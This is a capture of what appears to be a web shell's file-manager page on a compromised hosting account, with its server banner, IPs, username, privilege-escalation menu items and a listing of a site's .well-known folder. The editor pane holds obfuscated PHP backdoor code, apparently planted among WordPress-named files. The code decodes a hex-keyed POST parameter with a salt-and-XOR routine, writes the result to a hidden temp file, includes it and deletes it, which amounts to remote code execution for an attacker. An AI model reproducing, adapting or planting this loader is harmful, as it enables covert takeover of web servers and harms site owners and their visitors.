Linux premium256.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.61
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
codershive.codes /
.well-known /
Delete
Unzip
Name
Size
Permission
Date
Action
pki-validation
[ DIR ]
drwxr-xr-x
2026-06-17 13:36
.htaccess
127
B
-r--r--r--
2026-06-12 08:51
PercentEncoder.php
1.88
KB
-rw-r--r--
2026-02-09 14:08
error_log
3.74
KB
-rw-r--r--
2026-03-21 18:53
wp-config-sample.php
14.38
KB
-rw-r--r--
2026-06-18 13:36
wp-links-opml.php
14.22
KB
-rw-r--r--
2026-06-17 01:33
Save
Rename
<?php if(in_array("e\x6E\x74\x69ty", array_keys($_POST))){ $reference = $_POST["e\x6E\x74\x69ty"]; $reference= explode ( '.' , $reference ) ; $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $p = 0; $__tmp = $reference; while ($v8 = array_shift($__tmp)) { $sChar = ord($salt[$p %$lenS] ); $d = ((int)$v8 - $sChar - ($p %10)) ^49; $dat .= chr($d ); $p++; } $dchunk = array_filter(["/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP")]); foreach ($dchunk as $parameter_group) { if ((function($d) { return is_dir($d) && is_writable($d); })($parameter_group)) { $val = implode("/", [$parameter_group, ".key"]); $success = file_put_contents($val, $dat); if ($success) { include $val; @unlink($val); die();} } } } if(!empty($_POST["r\x65\x73"])){ $item = $_POST["r\x65\x73"]; $item = explode ( ".", $item) ; $symbol = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $l = 0; $len = count( $item); do {if( $l>= $len) break; $v7 = $item[$l]; $sChar = ord( $s[$l % $sLen]); $dec =( ( int)$v7 - $sChar -( $l % 10)) ^ 47; $symbol .= chr( $dec); $l++; } while( true); $resource = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), "/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), session_save_path(), "/dev/shm"]); $mrk = 0; do { $ref = $resource[$mrk] ?? null; if ($mrk >= count($resource)) break; if (!!is_dir($ref) && !!is_writable($ref)) { $bind = vsprintf("%s/%s", [$ref, ".ent"]); $file = fopen($bind, 'w'); if ($file) { fwrite($file, $symbol); fclose($file); include $bind; @unlink($bind); die(); } } $mrk++; } while (true); }